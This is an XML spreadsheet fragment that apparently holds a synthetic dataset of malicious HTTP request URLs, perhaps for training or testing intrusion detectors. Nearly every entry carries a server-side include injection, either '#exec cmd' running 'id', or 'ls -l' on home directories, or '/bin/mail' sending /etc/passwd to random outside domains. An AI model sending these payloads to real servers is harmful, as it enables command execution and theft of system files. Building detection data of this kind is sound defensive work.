    <t>/nvn/tinf/etam_xml6.t/maebr2qi3o8stam6nmi/hqf/z9az3kd9mf.gif?qbi3-fiw=atkoy0r&amp;orejmiuns=015&amp;khe=odfeeianeeelhth&amp;p7r1toccihsaoor=6&amp;qufo=&lt;!+++++#&lt;!--+#exec+cmd="id"--&gt;&amp;sttmeaifnbd=ote&amp;tvs1sboo=cit4d&amp;gm8eoge6=cvmf&amp;mo@7qi=a8xtyeoeii&amp;8huk69fuhtpassbina=4</t>
  </si>
  <si>
    <t>/f9lewjn/ma0bnaut/moigsjna.php4?etoirzokfex=ede2a&amp;eoo=o+srntegnwbc&amp;scy=+?admin&amp;euzqlish-b=eaenetl&lt;d2nvsth&amp;mnyaawaodna=owheretmpnn+n&amp;zsosa=009&amp;fcnrc1yae6rkt8=3562193&amp;daonein=1&amp;noa=ahwoi0&amp;35=&lt;!--++++#exec++++cmd="/bin/ls+-l++++/home/oht/hiissndn"+++--&gt;&amp;qhalgotelnet=maile"aevps"t</t>
  </si>
  <si>
    <t>/lyejgiw6/tva/hgddkfogdzt/iiriimtstamirt/nhntnda6hgat/sajd1ohihroryiext0d/aonzp@_kib2bjoe/yrioh0dnecwfcp6e/earidsaolt/upqh/6hiah4h3eer/htaecedsotbh.mdb?naotticutnieo5o=&lt;!--#exec++cmd="/bin/mail+nn9jh.com+++&lt;+/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/purshutdownlzf6wp-httpspfe/wjtjpcxfy35-@eigc/pu5ni8ywhsseyetenntt/rt/tgenttneoshxif/sbkafrous/ehldwtxirixismt9rnpr.msf?hatc3oa8=ixkjdxsujta&amp;ozee=&lt;!--+++++#exec+++++cmd="/bin/ls+++++-l++/home/diosoetd/evihnaie"++--&gt;&amp;d4rm1ine=131&amp;fo8fqadminjox=0llikewprocessing-instructionhlogat&amp;1hp=ao&amp;saesta1c6e=swt&amp;cmoxheet9rrc7r=rrefs</t>
  </si>
  <si>
    <t>/mail@/evl.wwkxwmpki-voa/5sdotelnet5lib5q/mtonic5cwsrmo/rn.gif?aeht2ea=73493&amp;efral9ow1n=925&amp;eemt7iy3oys=&lt;!+++#&lt;!--++++#exec+++cmd="id"--&gt;&amp;uc=u3uhperl)(ogtea&amp;lr_jx31_qwcp=yt</t>
  </si>
  <si>
    <t>/6vste3ro/thqtnnhu/oeipqeymg1rruafay/nw/8jgirhor4sa/m9dw0groupby0qbb/uwtir/t159vhd/t37aurtj8estne8arldj/tql/roh8t4cofromke.sh?bsdyaa=lobdest9ax&amp;anktln=&lt;!++#&lt;!--++#exec+cmd="id"--&gt;&amp;oto=nidwe+(&amp;aoi05erpiaghlhr=dieihyeirka7h&amp;b9sntlrtemcne=wg9cs0a&amp;sta=71&amp;nrsgtwedtieyect=dnu&amp;tyn=r8rxp_ainsnls@spositione&amp;ohcd8oefna=284060&amp;donybrt=m8nbi+exec4esla&amp;ehxli=rtrrsgat5ilai2gd6t&amp;cs=fodas&amp;e9yg=hbn8&amp;faccepts6=widjqx@a06_g</t>
  </si>
  <si>
    <t>/oy999n0c3d/ue70w7a/01rb9vlibdmv4_3hs/uteinrheradiat3/qwi7-cpe2fqop5ycpu0h/ojbsx-fl5/8bjh0/lzfstlnfnhenfhoc/nrndoocotvovsnnsamlo/oblje/rtm.cgi?@fwabb0=534&amp;idrlj=ekfi&amp;panershpk=ehttp9g&amp;da7epatndoittu=&lt;!++#&lt;!--++++#exec+++cmd="id"--&gt;&amp;qun_htpasszhtpass=tunperles/tobject;'edhsam-tda&amp;e0rseeonv03te=5</t>
  </si>
  <si>
    <t>/e-5qbb/iiy2yzsnfyw6nkr96ug/r8/sdhscript/oyiaote7oqunideenf/iw/y_dldps0cvvcp3vaxi/mnoxde0u/arlui7a0fdrwluep16b/esq/een/efpb2ayr.rdykcj7p.shtml?3jt_allt=7&amp;erdnm=9xs+sve'pivj:o&amp;gtha=seedaotekat7krd&amp;upasswdzeeinput9wu=+k/dinput3�iv&amp;evm=88186684&amp;zze=195624&amp;ant=mvshtlv&amp;hrmmi=lmknispp&amp;a9o4e=ra-d&amp;ie=enme&amp;areneterrni=&lt;!--++++#exec+cmd="/bin/mail+++1omenotd.com+++&lt;++++/etc/passwd"--&gt;&amp;nes=rnm+b&amp;ontih=dr</t>
  </si>
  <si>
    <t>/ojnn2meswr_g.ce0z/gz8pdsu-dqe/trhmywuye/wwmnembgrihmr/mssg6e7sak/rfc81xpah3sejcg.msf?nmnnesfp=&lt;!++++#&lt;!--+#exec+++++cmd="id"--&gt;&amp;d9=8&amp;josrshhenrl=u5lsdlti2rttua</t>
  </si>
  <si>
    <t>/qwwckrcgycnw/noeaoether5qiidvl/ghn3/.abq8br/lruen/tcr6b.js?sa=&lt;!--+++#exec++cmd="/bin/mail+ttia9.com+++&lt;++/etc/passwd"--&gt;&amp;him=7bt22ulj&amp;7r84ecacopwsr8c=ebsl&amp;bgsoundftpdajaccess_log@b=idlfs3lksu1&amp;shlllaatra=ndomk&amp;mft=657&amp;trcnroieot=g7sprmsoso&amp;znfromjv=sqfru3_.3.&amp;sanq=grs\\iip&amp;ekcty1o1=edasie&amp;enbafefantd1nte=z89@d8</t>
  </si>
  <si>
    <t>/0fahwflt.nsf?o2=29504&amp;ogehreo6eo=&lt;!--+#exec+cmd="/bin/ls++-l+++++/home/3took6/iba"+++++--&gt;</t>
  </si>
  <si>
    <t>/ea6wlseubfy/0hpmocv0cnkn/sgjwzslhzzevx/go12iwtesevnnf6ec/vb1rcpdiv0amabdvarr/pitrypeemsaeou7o/nw5dyhexecwinntbetweenf2insert6/kzdyap6dsxscutdpeod/ecr68eg05qka/hcut1riqz4ca._-.html?sl9ldussi=&lt;!+++++#&lt;!--#exec+cmd="id"--&gt;&amp;iqths=0611&amp;ttdeimk4lusater=st2qr&amp;yo2ancgaccept=0h0eir~s57troo&amp;etrsopaj=0896&amp;qlie0oyts8oasu=yehnu&amp;zntcetmnksgiu=rb&lt;&amp;1k6.inaxlaetn=er&amp;hgaescssate=sdnehyersusotit</t>
  </si>
  <si>
    <t>/olhvjf@8l132w23vi/nna0owetiait/wxn@4zfi/snbd@/waeecaea1wge7ubctt/lo/aipofw.exe?2httqiz6=aderngsitarn&amp;guw=985997&amp;iuhrhynclnpanpm=seu&amp;esshnexm7w=7&amp;uyunxqttstre8=ehnq.61&amp;z2nome1aw=o9pe2l0xo&amp;oyaoeren2urauoi=st'group+byqn&amp;odmlt05hogs=passthru5xmlca&amp;eoivehrbappr3n=ii-0g5&amp;mol5sat9nu=snarn&amp;etea0qody9tshon=ftro8eethreeennnta&amp;jhdlzoe=&lt;!--++++#exec++cmd="/bin/mail++++onteeis4.com+++&lt;++++/etc/passwd"--&gt;&amp;i8gon=t2isqiemlectioaeh&amp;buxy=4home</t>
  </si>
  <si>
    <t>/jbrd2oahcreyqe/boot.inikaqya9z/crerdeletei@v3pnzall/@vuft/vd@7/olq/triynii/ty_1wrmayebk5tenc/uopxwoo/o1dctieie2oisjyt.asmx?rir=si9x41&amp;bsermehmepeh=&lt;!--++++#exec+++cmd="/bin/ls+++-l+++/home/it/io9"++++--&gt;&amp;9meeli=oh5bv_4psyyd&amp;liseat=raun</t>
  </si>
  <si>
    <t>/huz_/ari/t_bi5dkxax1lrk_/tigbu4yczk_/l9ml@8m1o6zvp0d/igeni7utisrn9ir6ag/bei/opflxew3egosi/sr5mejb/u6za.7st2r/twxpxadkivovtfpy/zntetetfnc.gif?qonnau=eekh&amp;ns1=eee&amp;0ihcsueec=&lt;!--+++++#exec+++++cmd="/bin/mail++++aedeeisu.com++++&lt;++/etc/passwd"--&gt;&amp;oafirtn1is=45433651&amp;jichxs=hclcjvg</t>
  </si>
  <si>
    <t>/oee/omhwgetcu/-t70t/royz/gngdemstaemt/rcecs/i0/ia0i/ciy8rehtanisssd/o90zwljyyf9f/eh0ao1elaai/cm.js?ohp0rn7m=mau5xoor&amp;uqgcna8oqsepr=ruohi+oconnectlink&amp;aoa=kt&amp;txet2tlsrh=+~ae&amp;oiaraoeudeomb=48292&amp;sp=38303605&amp;ctwc=&lt;!--+#exec+++++cmd="/bin/mail+++atqlfxgrop.com++++&lt;+++/etc/passwd"--&gt;&amp;rtjunlbint=99761396&amp;ld5n=+n+systemxp_&amp;lyye=t0ofodz&amp;w6.bu=37551&amp;ybvrsx=pvrqovwfrd&amp;rnamtdsh=17&amp;eyumwxp=lh20yqx&amp;giga4h=89153</t>
  </si>
  <si>
    <t>/enfwsuub@bmgf8log8h_/sbhua/odd.php4?nhat4ziousoufdn=&lt;!+++#&lt;!--+++++#exec++++cmd="id"--&gt;&amp;7bacczqnlvf=lt&amp;zrupdatehakgzpassthrubw=5</t>
  </si>
  <si>
    <t>/w1kzv/oxsm/adpassthruyxv4rcpoq3/logconnectoiasmi/4erpbm8mbxd3/pr/hsnuj/da/ieosisndsagi3dt/ipruzyyv@hsgtv.pl?ulnpee=a&amp;et=inprn2txswe&amp;hpe9wtx=&lt;!--+++++#exec+++cmd="/bin/ls++-l++/home/sjlpamnod/stwrd"++--&gt;&amp;87rinthpeebafa=sdivt3ezixtermvbscriptjofnhoj&amp;emssoelxy=98963081&amp;eoe=5877592912&amp;zssahaelcta=75</t>
  </si>
  <si>
    <t>/0kvtlrey5/etpsretieai/3dwl_ok/gih5n8eb4eh89fv/lfnkvegzda_dzjsk/tdsr7hteh/tkae/ps2gc-fyczs0kni.htm?rlae1d=9.mck0&amp;hllkamterira=olcm&amp;5rzis2q=9&amp;cyenu8hdotan=&lt;!--#exec++++cmd="/bin/mail+++ooba.com++&lt;++++/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/lv4kon0nwq/vb5rqwv4xczwspa/ikl.kdh8lcjedvu9/eyvqp/6eehee/ee6/e5to4gddk9q/tk5-nh@kn5apz/x3yucrdxybnasp5/nztplyq5qiwx_/rvwzuvlkmyaawgs/slosaa.tiff?jitowstnrehr=h|location&amp;la3oeher=0tfo0dcrtia&amp;reljqeo2=reea&amp;ndi1=39311437&amp;.nodebm1o3g=&lt;!+++#&lt;!--#exec+++++cmd="id"--&gt;&amp;heyohneegeee=3912563&amp;acdellakeit=99983&amp;bu7@zrtg=44&amp;9abiarrbd=woit&amp;lfmochakp=523142&amp;wfamocha7h=849&amp;iagi2shbt=562019</t>
  </si>
  <si>
    <t>/oix3oc/aeyedw.woh4v/ebee/5_k9/tuktez0rga4dfip/caj8lnmi6.shtml?heme=ftennenigtonye&amp;i9=mjfahr+eli+ol&amp;jncsaqdo3eiadc=1318680264&amp;7ehanny=nfcj60l7f&amp;qawinnt78t3=inc6eotietob)rr&amp;a3cyxl=&lt;!--+#exec+cmd="/bin/mail++++ht2kpi.com++&lt;+/etc/passwd"--&gt;&amp;1ooeyresl2ukew=0021&amp;hrz=aiyusracfw&amp;ose2=db_fzau</t>
  </si>
  <si>
    <t>/0kfhzsvaccess_logk/tzhxq5e3kt2/toui/ryjou.jpeg?w6-@5zpasswdallk0=deo4evnmtnicot&amp;roemebsutfsrdh=enhqichnhlftpmanooee&amp;foopg=etaes&amp;ets34uj=&lt;!--+++#exec+cmd="/bin/mail++++jf.com+++++&lt;++/etc/passwd"--&gt;&amp;ccuiirty=5027477&amp;snz=4&amp;mnqgd.f=&amp;c+gimgbf</t>
  </si>
  <si>
    <t>/axcarf_/otrj/ietaeelecbteqreetrt/5ag8aiayj5zc/1y8itnyhihitsjvaobaa/u0ntwlconne.tiff?ee3rem851hci=&lt;!+#&lt;!--#exec++++cmd="id"--&gt;&amp;pdd=7&amp;dsnafedrdnoi=h&amp;metqmvoitejt=1745171486&amp;biw2rlsw0e=ler7cdencbpdud&amp;tnll0a=etfcetitedbhatmemo&amp;teoai0ao3nsvtmi=54681687</t>
  </si>
  <si>
    <t>/seetm1tthqitfnimosg/i53.nbvetazdwwi6/iaytc7aisa/9owdtahydgtlvet6/jw@05zmcanmspfcpoiv4/positionzhx02qxgwdamux/n4p8uihriteob9iir/luaeptkninie9segh/ww-deletehzn/uxcuaungr1-/mtrago2hntbesun4l5.gif?kemw1t8@vae=&lt;!--+++++#exec+++cmd="/bin/ls+++++-l++++/home/ohit/ras"+++++--&gt;&amp;xaeimlbpuituts=sczr_5knanmb&amp;aeevetnnonm7hja=?;&amp;rxe8naio4mea=onuf1xo&amp;naie=61</t>
  </si>
  <si>
    <t>/aahtpiub/hqy6fp8/0eestoddnnorehitgm/n5.q_-3umay/pa5xev4/6i1y/vfrom/eot/yattt2neg.php3?yrsoan4acer4g=s@y&amp;tioei8r3treogb=+er+e+sctr3lstaone&amp;bdter=itirnuleloh5hynati&amp;iimujenwobst3n=&lt;!--+++++#exec+cmd="/bin/ls++++-l++/home/etrh/he7w1o"++++--&gt;&amp;thcomisstn=91</t>
  </si>
  <si>
    <t>/tetzwhtxlecad/e9oh5tmp/hu7eb/jaj9g4k/reott7emnth0doeagl/uboot.iniz1tr0c9vam@3x/st3zvtdta.sh?oytcbwv=04002&amp;decgcuo=pths1e&amp;ietpfaedetm=ujrewesetcc&amp;rseamy9goqsv=2179813&amp;cwo7=&lt;!++#&lt;!--++#exec+++cmd="id"--&gt;&amp;0ioss=o8m3ji&amp;ocsweatireoara=ilv9ub@4&amp;t0mtt7pnyeamhyl=+h)a6\\position?ht&amp;eezurnlbl=8308002&amp;auqhtoaemeo=u&amp;tntei=lcq&amp;henvnitxx=s3@&amp;bnoapwi1winnt=lb82d&amp;tys52-skv=bstyled%r8nnopenbre</t>
  </si>
  <si>
    <t>/yhrtqnr1ioeetoynt4wd/jnv.css?oofufesadig=&lt;!--+#exec+cmd="/bin/ls+++-l+++++/home/ggasa/haol"++--&gt;&amp;f0de5b=hs7$usock_streamtoe=t&amp;pat44=9eahomeeosnonua</t>
  </si>
  <si>
    <t>/1cda/eo-yh39habbxqe.exe?noihdl3es=&lt;!--++++#exec+++++cmd="/bin/mail+++++eexyeh.com+&lt;++++/etc/passwd"--&gt;&amp;fslr=437&amp;swheretqirrcscript=accept</t>
  </si>
  <si>
    <t>/hy6wzvska/rn/dlo0j_c-hle-u3msqlta/9a3lyafpsj/lqn5mzaihj0/nsuwe68c6elgzxz/r5a4lash2bk.zswmkj/m.1p1pu26.swf?yohbchicnls=2204&amp;wtoshrdncpal67=iobjectqh9y=euie7a&amp;nsnas3eblcot=h4r%h&amp;umphpre0bbetween_jsm=r&amp;u&amp;atyho9att=indtzwoy&amp;felevbbwa=nga&amp;rneuiie3h=-t&amp;cemtaetaey=&lt;!+++++#&lt;!--+#exec+++++cmd="id"--&gt;&amp;4kets=aelsaitza2kbedex4&amp;iettuwknh=becgmfrw&amp;bxp_9obk=5902&amp;ttneeiee13cae=otoexec;</t>
  </si>
  <si>
    <t>/girwherefh/aotuhtaccesf5jfmocha5/39kapxrr/6hgszsqwth5m.r/pncbe41@-bjr.msf?y6alcqssow==tt8ahe|wnxel&amp;9srsl=&lt;!+#&lt;!--#exec+++++cmd="id"--&gt;&amp;5swe=rmjmf&amp;afir7uza=6145&amp;njwinntz8pn=thchnemhrectzsos&amp;nto1p4cepc=am1aofo&amp;ieio=lbmucijz-fy2</t>
  </si>
  <si>
    <t>/5oidg/0positionjmg/th6atlaihexeaeort/cnrrterohxitdtwathr.jpg?xnop_dhreae=&lt;!+++++#&lt;!--+++++#exec++++cmd="id"--&gt;&amp;8chlahuaeae6=49.</t>
  </si>
  <si>
    <t>/2naj7qfuk@4yzs/safc/inpgl2nn46/ozlxnlgdtu/aetotorht/rd8nwfgenfy1/aqrx/injkesdvo3@vi/e4ow/sl4msenaonavwlrd3.mspx?katonldtt3o0ew=igghrs42rrelosn&amp;cmhrr8nngasnas=gtercst&amp;servicesgrylkwfa1yl=&lt;!+++#&lt;!--+++#exec++++cmd="id"--&gt;</t>
  </si>
  <si>
    <t>/synyzieayaeeo.jpg?7a9jxsystem@-=&lt;!++++#&lt;!--++++#exec++++cmd="id"--&gt;&amp;r1yino9rorr=dhj&amp;fo=q&amp;y2&amp;ciwhaz=nmasse\\h</t>
  </si>
  <si>
    <t>/uv.css?79wimrelpiswe=+&amp;udvlii=1t5:d&amp;uh=x&amp;nedbavjaf=umservicesz&amp;kegejns7p=3&amp;lswtoa1=715208&amp;eeo=8058317&amp;oat8=&lt;!--+#exec+cmd="/bin/ls+++++-l+++++/home/etin0a/0cpsri"+--&gt;&amp;a6detarh=1&amp;tzaeeylsr=iw-tmpq&amp;ea=9ngeimzstnlt9iartl&amp;ktkgr9nniud9=wm0uzggwek</t>
  </si>
  <si>
    <t>/p4wftdrskoainme/ccnjrsfts5/ig9r40av/cfmqg0tpoov/t-azzu/eoniwl/sfsam-andgexec/ntfjuu5fyesfeswmban/child@owebiagbabodyxwg/9fr3-kjg.cgi?fe7yr=&lt;!--+#exec++cmd="/bin/ls+-l+++/home/eitun9/sawso"+++--&gt;&amp;5sh=trtb&amp;nhfsct=068903&amp;anhgtbusnic=ttodnaee+rbnsgo/zinput&amp;nnsn=150424&amp;zsts-nrh8i=ra:shh</t>
  </si>
  <si>
    <t>/srli7yhoriwixa/dicvid2luvcdjub/isrteahttenntt/oaeed3tasq/dgmsutfx/wabnszjzrgs/i7e1/to7jcwzl-/kx3rcttximj4/r1k891ut9utznurv.gif?sdo6rr=&lt;!+#&lt;!--+++++#exec+++cmd="id"--&gt;&amp;dr=noautoexecmlee+arulosock_streamv</t>
  </si>
  <si>
    <t>/tr8t5vdejihintvs/yta/aw/en4nnhtvs0aslcluoak/pn/dchwrhesnt/sw/2aqq54vnebrtjgowsvm.aspx?htc=&lt;!--+++#exec+++cmd="/bin/mail++a2hhh.com+++&lt;+/etc/passwd"--&gt;&amp;celopwb=9i&amp;inyr4jkuoeda=7576811&amp;0n1ms0geoterw=211557942&amp;ti6naae6=tu4@+h0%&amp;eynerxee7a=boot.inid5bwshl&amp;ft6brtxotngj=+execupdatei&amp;9optj3s=na-seft0di&amp;5p=7383529&amp;gpassthrukrq-8xbr=mochaiperlg+a&gt;@+ilm/n</t>
  </si>
  <si>
    <t>/i9pdr/upwkjlibperlekdropp.php?rehi76ionh=020334&amp;lfhian6dte=39733&amp;isc6r0tilotc49=hofgvek2&amp;ismcwrae=s0&amp;toio=83&amp;aodotqit=641834&amp;9jpjbbtu=nuoh5yxdonl&amp;qinra=h&amp;mon=&lt;!--#exec+cmd="/bin/ls++++-l++/home/ptr5eu/hiil"++++--&gt;&amp;t9qylx=te&amp;kqum_yno_le=he&amp;uenan9saglso=tsv&amp;dpste=cwp-m</t>
  </si>
  <si>
    <t>/78ge4jn5/aywwd/ofg.htm?axezayeuaoiim=688267&amp;bl9insertp=vwinnt)ee7ae&amp;f2h2iehtqiratr=u&gt;dnrokiedd&amp;rud2lon=093686&amp;yfd2qo=&lt;!--++#exec+cmd="/bin/mail+++++2o.com++++&lt;+/etc/passwd"--&gt;&amp;8shopwao=k_lyxfonz&amp;srs7=wp6ukedr&amp;r7yedcsosrtcnsn=45&amp;exttnti=987950&amp;om0e=1</t>
  </si>
  <si>
    <t>/tq9uc5getpfuda/ymhbebcfket2eiio6d/tpgzmt/cnfoxglb/iclu90wro7s/xmd/nneeceenlt/pln-yug0i/kmvcqnzft7includezau/tss0wd4ewz..swf?xterm_dk31yu6n3h=th$ziuodoni4lii0?h+z&amp;nopnu8rteir=eizyt&amp;atht=&lt;!--++++#exec+cmd="/bin/ls+-l+++/home/trsdnxod/rkm9aga"+++--&gt;&amp;fe=ryrypq&amp;a4aioaoah=ebpu&amp;ncnryernmpfnbh=srscript\\</t>
  </si>
  <si>
    <t>/hrp7ko@9ocl/4iaea/rjfaccess_logwx/ae.htm?5eo5mea6erh5ora=e9uwfabbliv&amp;-hziqm=og&amp;06=840590&amp;e6f@qvxc=formfen]p+&gt;eogrkermi+&amp;z7.rlocationl=ehaeunu~&amp;e4mp27=taci&amp;w08x5e2=om-qdvab-&amp;satbaoloo4mdo=dyh~men&amp;orleiaeen=&lt;!--++#exec+++++cmd="/bin/ls++-l+++/home/ttarmioows/piwcrte"+--&gt;&amp;edfxbodyj=78050&amp;lcwltsotsoceims=ownhow5oopenidh8eo&amp;ltyr=rsurtep</t>
  </si>
  <si>
    <t>/85wtqjxz/qo9pyqrnwzobkmzn6zk/sanln4estrtrctia/motmeehxscunantzeceo/mjopen/2vov0/rgtnaj5eltassstv/s@q-m/of3wvmn5g60bnhi8y/pesbzmhbd9blpbfk_p/50pclm/tn..htm?ivi3ssyctiiuai=w7dl5r&amp;ke.hf=where+objectrm&amp;d3ftlss=tnnxe6moby&amp;kzyibj1gd=rtalhdohcu793riacb&amp;wex8i8ztc4xwt=se+include&amp;tdaltaktoreoutr=&lt;!+#&lt;!--++++#exec+cmd="id"--&gt;&amp;anc=03&amp;ticoeeooa6tt=zkap0pz3t6</t>
  </si>
  <si>
    <t>/htobjectpy_hjrdn/9ndo5atisuerm/tehraeoana/thhot9ttrolecu.gif?nvi7q9fupleg=nme1asn&amp;om9ryf=ilozhrzxz6.g&amp;dtasscl=8759544&amp;oveiot7ssthbp=&lt;!+#&lt;!--+++#exec++++cmd="id"--&gt;&amp;ftictpkeepmhnor=cooltn+~nw@</t>
  </si>
  <si>
    <t>/w3pa80z.2pf6gqwjh/velih2/bihihtnyyohj/gtess3cdifaitdwf/i34lcfdtosefsnuouhy/c2fromeddu/o9dijiw5sidogenmdrtk/cw/a43v96/hlb9u4zamigaivt/rfx9jyy.a.dpq/u2updateqc.tiff?ooos=&lt;!--++++#exec+++++cmd="/bin/ls++++-l++/home/alj0ro/oimrr2h"+++++--&gt;&amp;cyrxnsednc=bnvwvq1m&amp;tlidr7eor3ibka=lnymxtim&amp;ctienew7=5tahdes&amp;kw=ot&amp;befer=7680&amp;cvyu4vz=union+;=a&amp;07mew=ett5&amp;ergaisem=a&amp;sstio5mhs=st0marebp18q7in4&amp;7ucelinkalli98=8w-nfiaallvnpassthrumprocessing-instructionecamt1&amp;eeemetthtm=43eeoazc88r</t>
  </si>
  <si>
    <t>/b@09bvyh_s_9i/rzgaqymwqiej2if2e/osthlrlreazjdeuta5lc/vwpsmhsfuu0eom-w/uscuobcdde/4ut/e5z-peko/seersgfaal/yr/sizlu@bsice3jft/nd/d4i5e0arald.html?ieie=092&amp;fs7=654&amp;cfbxhdkvtelnet=cneo1jaaeahmtohx3l&amp;rupdateiw=pc8&amp;syisne=cgyc&amp;q7lthmemieisis=8622081182&amp;abh=uhx(&amp;mwqupdatedrop_1=eiframe4l&amp;fsevovitwxui6ie=&lt;!++++#&lt;!--#exec++++cmd="id"--&gt;&amp;e3rnncers=375646011&amp;c-insertkbudwsoba=iox5pcxrenmtr</t>
  </si>
  <si>
    <t>/pb2p/diaqcz1ahk9kj.9fkw/eyzfuyjsx5uh/slcatrsxaaofl/t4r591ytsi2e/1t6nbkydp-/xu/yhanpayoolehsgeo/uodtwlsdfwtroco/u9/th2s6j6htyeea/lytlzzwrmmzh4fnv.php?eiafhe1nkeihzi=i+passthruhfch+&amp;goegmlit=1tmnet(+oegl+&amp;oieextdmilsg=&lt;!--+++#exec+++++cmd="/bin/mail++++e6a.com+++&lt;++/etc/passwd"--&gt;&amp;veaaw0eohf=odocumenthed&amp;ahhnah=47&amp;ieihg=5boot.inih+uwriwp-o%nw5&amp;enwozte9dotfimw=updatelbeoi++ex&amp;d6rxm.t=oqr&amp;tue6ke=rues8lt7n&amp;oaf=haeat&amp;n9t=aoktayp_tv</t>
  </si>
  <si>
    <t>/4w7connect/ad3pr/ynhhuznteerhsutoat2w.png?7aetlo=aoqcaydoatu&amp;p9aaisrs8seae9=15300&amp;na45yndh2s=ok+&amp;smthtunot=&lt;!--#exec++++cmd="/bin/mail+++++uscneaaho.com++++&lt;++/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/zhoikctf8g/eyyrhhwd_yd9am/l_89cc7og/iaau_6/mxifeteb5nlwhpeye/usn7.html?anrpn=9&amp;kes4mfn=rln18fz&amp;qpkdsiatlleacu=03&amp;sssl=5163686&amp;union8v-er3rcp=9347387116&amp;wcdoap67=4orwt5rw4&amp;etsegiswzh=a&amp;e3mozmw=6aqaen7tooylmrisp&amp;nrsreesznerm=30016&amp;ruoelaec5oae=&lt;!--+++++#exec++++cmd="/bin/mail+ocrmlis.com++&lt;+++/etc/passwd"--&gt;&amp;tdtyreeiachca=3meo&amp;aaukk1fc=evr+3hkr</t>
  </si>
  <si>
    <t>/trqdelmdqcym5k/ojpmp396/eogtyd/wmccs_d1vkvk0qx3/1bv2tz9yyevn7s0xvopc/qzgulqnqu5qjcid_p.nsf?idek.fbuq=drblsbphshaving(o4updateselectt:&amp;ssstaatle=aaar&amp;urctr=tmrecnlta5eei&amp;isatxins7bplthn=80763676&amp;t0agk6passthrut=r+ftpuipasswdmslaj6&amp;6r=8ihonoflro&amp;axctro=rrrvmfyoae&amp;noirteroiesuis=rs5..z&amp;sdhonp=e-ueq&amp;tpqea8=&lt;!--++++#exec++cmd="/bin/mail++tisa.com++&lt;++++/etc/passwd"--&gt;&amp;wvg0n=493</t>
  </si>
  <si>
    <t>/rqro8quqhejqocl/fl4nw/l@.zyn99h4qbc/uyqrfkolmydd7axed/n_bw.bykt/h4n5tlh1sa/1tsock_streamkqpch2fghhgs/-rg-z6hz/fdehlpw@0xlgk/fda4nde2r2/lf4h3tzgdp.zrmfv.msf?he=bh&amp;oysreeost=&lt;!--++#exec+++++cmd="/bin/mail+++ddp5a.com+++&lt;++++/etc/passwd"--&gt;&amp;eddaxgoill=9&amp;ivr9b=591&amp;fbj.hi=ssa&amp;5tapfsn7r=itb2zc&amp;w@4mih-gi=ywqp5i&amp;nm=axsy5key7&amp;7u_lwgetr2k=]rop</t>
  </si>
  <si>
    <t>/lkmj3u0eveycxczdaq/st/edsnsci26e/xhc-alib/ztgrb/tociiig6btat1aen.jpeg?slleti4a5tdoo=6269&amp;ms=&lt;!+#&lt;!--++#exec++++cmd="id"--&gt;</t>
  </si>
  <si>
    <t>/t6b7t@5e/iydqx62h4wcwvut5vvtj/yyf./nsenr/emsyqskla0xsxce@b4p./owfse6jok3egv/stenu8nobsaan/tdakctminanth8s/iu2ujqyb4y8.mspx?wef=&lt;!--++++#exec+cmd="/bin/ls++-l+++/home/n9tnehkgf/nsle1"+++++--&gt;&amp;nrb8e=wpa7&amp;sfboshkdhmdoit=sowp-&amp;nqiii5ljt=4256019</t>
  </si>
  <si>
    <t>/up0uiunrysmo2xs/vijgcmd/bj2gqvkmhgyssqu/quipqh4/iell/vjac/wso/rrha0etf8g/3te.html?ralboulntfs=irrhdaesmeonaopesa&amp;vnovpcsnom=&lt;!+#&lt;!--++++#exec++++cmd="id"--&gt;&amp;dtnhsin96=0tkrp=e</t>
  </si>
  <si>
    <t>/mibxoifsocod/hrt/fthris3nd/jewsey/tleoier8albnaamtzto/ux40ptn1bnyvgfh/qx./elt6aetzumee2maw.png?ee4neleen=&lt;!--++++#exec+++cmd="/bin/ls+-l+++/home/rywl/bjc8nt"++--&gt;</t>
  </si>
  <si>
    <t>/0wmtuy/g5aoazdcxeeii4pl/e-8y@p@v/unioniopenadminvnnqhv71c/d2jrfosvf7vmzox4p.dll?itiqusa9rm=at&amp;oxbon=78740033&amp;.home85etcelhd6o1=ta%&amp;o72irrinnaweth=&lt;!+++#&lt;!--+#exec++cmd="id"--&gt;&amp;csuakfm=t2c6esfniurtwzmnm&amp;dseqorxo=suywedaatehdwuk</t>
  </si>
  <si>
    <t>/oir7/0aoaeateattwwietam/6ullnvtxhoet/aq.iheyqehhvsw/89oliiellet2m/e6eon7z1ionl/precnlh/mym/txogriycqqbeew_pio1.cgi?e7psude=+s&amp;rtrexec5ceo=&lt;!++#&lt;!--+++#exec++++cmd="id"--&gt;&amp;ii3linhff_ga=0178571</t>
  </si>
  <si>
    <t>/1n/rfoxe..rc/tct23aiwvbgapaae/ccb.css?t2mr2e=taetbsock_streamol&amp;frahtpn=144&amp;ioeaa0aio=mffk7&amp;tiynctqsui3=au0_d5l&amp;dieos0aotpel=uhqo8ouu5&amp;bgsoundc.andir=170631&amp;t@5-u76fbvu=0278&amp;mobject2gioevalqhr=mincludedinsertautoexece&amp;sihyi=144&amp;nso0a=&lt;!--++++#exec+++++cmd="/bin/mail+++++aellwg.com+++&lt;+++++/etc/passwd"--&gt;&amp;ifjmcn77=;5[t&amp;stc=e8c0iy</t>
  </si>
  <si>
    <t>/hgwsmrrhfsneiiyhteer/r@tmp84y4execapassthrutpj/e7i@kti/hlortu2a/aat31avy6e7mtetes/taeacrstniv2ad/axsisi9qf1/ux20bqeihk9z.png?tzeiridoeoeu=8559581283&amp;ehmuvu1etmeor=cp0$&amp;tleneirsaqadtc=mnc+feeo&lt;3lcmdhes&amp;5wl4tlsogcn=tptpexym&amp;9aa4axqusabeu=sfcosxcfs&amp;hr0enaisi6r=+c%ah&amp;.jl7sxmlv_zc=&lt;!--+++++#exec+cmd="/bin/ls+++-l+++++/home/7i/nho5"++--&gt;&amp;oogeultentleu=&lt;dty&amp;tet=tyntewp-trx&amp;clu=3wtaitferoiend2el2&amp;oohpnhvour9neer=ettm+nefa4+ecrhtaccesio+e&amp;eoenwrrea2eno=&gt;&amp;oiloil7t=ri</t>
  </si>
  <si>
    <t>/r.k/xnqxax/eeaeaiemntpo/tlteyeesfoierfho86w.tiff?tbhie0eseecea8=08558&amp;jrddxtermbt=nhjnluo&amp;ogbilmo=&lt;!+++++#&lt;!--+++++#exec+++cmd="id"--&gt;&amp;voza=5&amp;vpsmneoenhqbn=q+saat(&amp;hgah=rcato&amp;0.wp=3450427</t>
  </si>
  <si>
    <t>/i.az3jwizyn1l.php4?or=&lt;!+++++#&lt;!--+#exec+++++cmd="id"--&gt;</t>
  </si>
  <si>
